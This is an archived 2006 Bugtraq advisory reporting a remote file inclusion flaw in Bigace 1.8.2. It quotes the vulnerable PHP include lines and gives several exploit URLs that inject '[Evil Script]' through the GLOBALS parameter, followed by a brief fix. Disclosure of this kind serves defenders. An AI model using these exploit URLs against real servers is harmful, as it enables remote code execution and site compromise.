Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Bugtraq
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

Bigace 1.8.2 (GLOBALS) Remote File Inclusion

from [vampire_chiristof] Network Security [Permanent Link]
Subject: Bigace 1.8.2 (GLOBALS) Remote File Inclusion
Date: 26 Aug 2006 08:14:15 -0000 
Author : Vampire        

Location : Iran - Tehran

HomePage : http://www.hackerz.ir

Email : Vampire_chiristof[at]yahoo[dot]com

Critical Level : Dangerous

------------------------------------------------------------------------
---------------

Affected Software Description:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : Bigace

version : 1.8.2

URL : http://Bigace.sourceforge.net

------------------------------------------------------------------------
---------------

Vulnerability:

~~~~~~~~~~~~~

in download.cmd.php , admin.cmd.php , upload_form.php We Found Vulnerability 
Script

----------------------------------------admin.cmd.php-----------------------
---------------

....

<?php

            require_once($GLOBALS['_BIGACE']['DIR']['admin'].'styling.php');
            
require_once($GLOBALS['_BIGACE']['DIR']['admin'].'functions.inc.php');
            include_once($GLOBALS['_BIGACE']['DIR']['libs'].'io.inc.php');
            

?>

...
----------------------------------------download.cmd.php-----------------------
---------------
....

<?php

            include_once($GLOBALS['_BIGACE']['DIR']['libs'].'io.inc.php');
            

?>

...


----------------------------------------upload_form.php-----------------------
---------------
....

<?php

           
require_once($GLOBALS['_BIGACE']['DIR']['admin'].'include/mode_constants.php');
            

?>

...




----------------------------------------item_main.php-----------------------
---------------
....


<?php

          
require_once($GLOBALS['_BIGACE']['DIR']['admin'].'include/mode_constants.php');



?>

...



Exploit:

~~~~~~~


http://www.target.com/[Bigace]/system/admin/include/item_main.php?GLOBALS=[Evil 
Script]

http://www.target.com/[Bigace]/system/admin/include/upload_form.php?GLOBALS=[Evil
 Script]

http://www.target.com/[Bigace]/system/command/download.cmd.php?GLOBALS=[Evil 
Script]

http://www.target.com/[Bigace]/system/command/download.cmd.php?GLOBALS=[Evil 
Script]

http://www.target.com/[Bigace]/system/command/admin.cmd.php?GLOBALS=[Evil 
Script]

Solution:

~~~~~~~~

Sanitize Variabel $GLOBALS in download.cmd.php , admin.cmd.php , item_main.php 
, upload_form.php

------------------------------------------------------------------------
----------------

Shoutz:

~~~~~~

~ Special Greetz to My Best Friends Cephexin , Sh3ll , MFOX , Alijbs and All 
Real Hackers
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • Bigace 1.8.2 (GLOBALS) Remote File Inclusion, vampire_chiristof <=
Previous by Date:  Sql injection in Xoops, Omid
Next by Date:  Jupiter CMS 1.1.5 index.php Remote File Include, D3nGeR
Previous by Thread:  Sql injection in Xoops, Omid
Next by Thread:  Jupiter CMS 1.1.5 index.php Remote File Include, D3nGeR
Indexes:  [Date] [Thread] [Top] [All Lists]